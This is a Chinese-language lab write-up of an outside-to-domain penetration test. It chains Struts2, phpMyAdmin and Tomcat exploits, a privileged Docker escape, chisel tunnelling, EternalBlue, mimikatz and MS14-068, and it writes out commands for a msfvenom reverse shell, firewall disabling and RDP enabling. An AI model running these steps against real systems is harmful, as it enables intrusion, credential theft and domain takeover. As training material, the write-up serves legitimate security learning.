从外网到内网的渗透测试技术详解<\/h1>

环境概述<\/h2>

本次渗透测试环境涉及多种漏洞组合，包括：<\/p>

反序列化漏洞<\/li>
命令执行漏洞<\/li>
Tomcat漏洞<\/li>
MS系列漏洞<\/li>
端口转发漏洞<\/li>

域渗透技术<\/li> <\/ul>

环境配置<\/h3>

机器密码：<\/strong><\/p>

WEB主机(Ubuntu): ubuntu\/ubuntu<\/li>
WIN7主机: douser\/Dotest123<\/li>
WIN2008主机(DC): administrator\/Test2008 (后改为Itchen123)<\/li> <\/ul>
网络配置：<\/strong><\/p>

111网段为web网卡<\/li>
183网段为内网<\/li> <\/ul>
Web打点阶段<\/h2>
信息收集<\/h3>
端口扫描发现4个开放端口：<\/p>

2001端口：Struts2框架文件上传接口<\/li>
2002端口：Tomcat页面<\/li>
2003端口：未授权访问的phpMyAdmin<\/li> <\/ul>
Struts2-046漏洞利用<\/h3>

使用工具扫描发现存在S2-045和S2-046漏洞<\/li>
确认S2-046漏洞可成功执行命令<\/li> <\/ol>
phpMyAdmin后台getshell<\/h3>

确认版本为4.8.1，存在CVE-2018-12613远程文件包含漏洞<\/li>
利用步骤：

执行SQL语句并获取当前页面cookie中的phpMyAdmin值<\/li>
构造payload利用文件包含漏洞<\/li>
写入一句话木马并通过文件包含漏洞读取<\/li> <\/ul> <\/li> <\/ol>
Tomcat文件上传漏洞(CVE-2017-12615)<\/h3>

确认版本为Apache Tomcat\/8.5.19<\/li>
利用步骤：

刷新页面并抓包<\/li>
将GET请求改为PUT请求<\/li>
上传jsp文件时使用双\/\/绕过限制<\/li>
上传冰蝎payload并连接成功<\/li> <\/ul> <\/li> <\/ol>
Docker逃逸技术<\/h2>
判断是否在Docker容器中<\/h3>

检查hostname（通常为一串数字）<\/li>
执行cat \/proc\/1\/cgroup<\/code>查看是否有docker字样<\/li>
检查根目录下是否存在.dockerenv<\/code>文件<\/li> <\/ol> Privileged特权模式逃逸<\/h3> 判断是否为特权模式：<\/p> 执行cat \/proc\/self\/status | grep CapEff<\/code><\/li> 特权模式掩码通常为0000003fffffffff<\/code>或0000001fffffffff<\/code><\/li> <\/ul> <\/li> 逃逸步骤：<\/p> 查看分区情况fdisk -l<\/code>，确认宿主机磁盘（通常为sda1）<\/li> 将宿主机磁盘挂载到容器中<\/li> 写入计划任务反弹shell<\/li> 在攻击机监听获取宿主机root权限<\/li> <\/ul> <\/li> <\/ol> 内网渗透<\/h2> 信息收集<\/h3> 通过ifconfig发现183网段<\/li> 使用msf进行路由转发<\/li> 主机扫描发现三台内网主机：129、130、128<\/li> <\/ol> 横向渗透<\/h3> 使用chisel建立socks代理：<\/p> Kali开启服务端监听：.\/chisel server -p 8080 --reverse<\/code><\/li> Ubuntu客户端连接：.\/chisel client VPS_IP:8080 R:socks<\/code><\/li> <\/ul> <\/li> 配置proxychains：<\/p> 编辑\/etc\/proxychains4.conf<\/code><\/li> 添加socks5 127.0.0.1 1080<\/code><\/li> <\/ul> <\/li> <\/ol> 永恒之蓝漏洞利用<\/h3> 探测内网主机MS17-010漏洞<\/li> 使用msf的exploit\/windows\/smb\/ms17_010_eternalblue<\/code>模块攻击<\/li> 成功拿下192.168.183.130主机<\/li> <\/ol> 域渗透技术<\/h2> 信息收集<\/h3> 查看域内主机：net group "domain computers" \/domain<\/code><\/li> 获取域名：ipconfig \/all<\/code>发现demo.com<\/li> 查看Administrators组成员：net group "domain admins" \/domain<\/code><\/li> <\/ol> Mimikatz提取密码<\/h3> 执行mimikatz.exe<\/code><\/li> 输入命令： privilege::debug sekurlsa::logonpasswords <\/code><\/pre> <\/li> 获取用户密码：douser\/Dotest123<\/li> <\/ol> MS14-068域提权漏洞利用<\/h3> 漏洞条件：<\/strong><\/p> 普通域用户及密码<\/li> 用户SID<\/li> 域控IP<\/li> <\/ul> 利用步骤：<\/strong><\/p> 使用MS14-068.exe伪造票据：<\/p> MS14-068.exe -u 域用户@域名 -s 用户SID -d 域控IP -p 用户密码 <\/code><\/pre> <\/li> 清除内存中的票据（使用mimikatz）：<\/p> kerberos::purge <\/code><\/pre> <\/li> 注入高权限票据：<\/p> kerberos::ptc 票据文件 <\/code><\/pre> <\/li> 验证权限：<\/p> net use \\域控主机名\c$ dir \\域控主机名\c$ <\/code><\/pre> <\/li> <\/ol> 拿下域控<\/h3> 关闭域控防火墙：<\/p> sc \\WIN-ENS2VR5TR3N create unablefirewall binpath= "netsh advfirewall set allprofiles state off" sc \\WIN-ENS2VR5TR3N start unablefirewall <\/code><\/pre> <\/li> 生成msf木马并上传：<\/p> msfvenom -p windows\/x64\/meterpreter\/reverse_tcp LHOST=攻击机IP LPORT=4444 -f exe > shell.exe <\/code><\/pre> <\/li> 创建服务执行木马：<\/p> sc \\WIN-ENS2VR5TR3N create bindshell binpath= "c:\shell.exe" sc \\WIN-ENS2VR5TR3N start bindshell <\/code><\/pre> <\/li> 开启远程桌面：<\/p> 使用msf模块post\/windows\/manage\/enable_rdp<\/code><\/li> 或直接执行： reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" \/v fDenyTSConnections \/t REG_DWORD \/d 0 \/f <\/code><\/pre> <\/li> <\/ul> <\/li> <\/ol> 技术总结<\/h2> Web漏洞利用<\/strong>：<\/p> Struts2反序列化漏洞<\/li> phpMyAdmin文件包含漏洞<\/li> Tomcat任意文件上传漏洞<\/li> <\/ul> <\/li> Docker逃逸<\/strong>：<\/p> 特权模式检测与利用<\/li> 宿主机磁盘挂载技术<\/li> <\/ul> <\/li> 内网渗透<\/strong>：<\/p> Chisel隧道技术<\/li> 永恒之蓝漏洞利用<\/li> <\/ul> <\/li> 域渗透<\/strong>：<\/p> Mimikatz密码提取<\/li> MS14-068域提权<\/li> 域控权限维持<\/li> <\/ul> <\/li> 遇到的问题<\/strong>：<\/p> 通过代理的meterpreter会话不稳定<\/li> 木马执行有时会报错<\/li> 需要进一步研究稳定回传shell的方法<\/li> <\/ul> <\/li> <\/ol> 防御建议<\/h2> 及时更新中间件和框架补丁<\/li> 限制Docker容器的特权模式<\/li> 加强域内权限管理，及时安装安全补丁<\/li> 启用防火墙并严格限制端口访问<\/li> 对数据库管理界面实施强认证<\/li> <\/ol>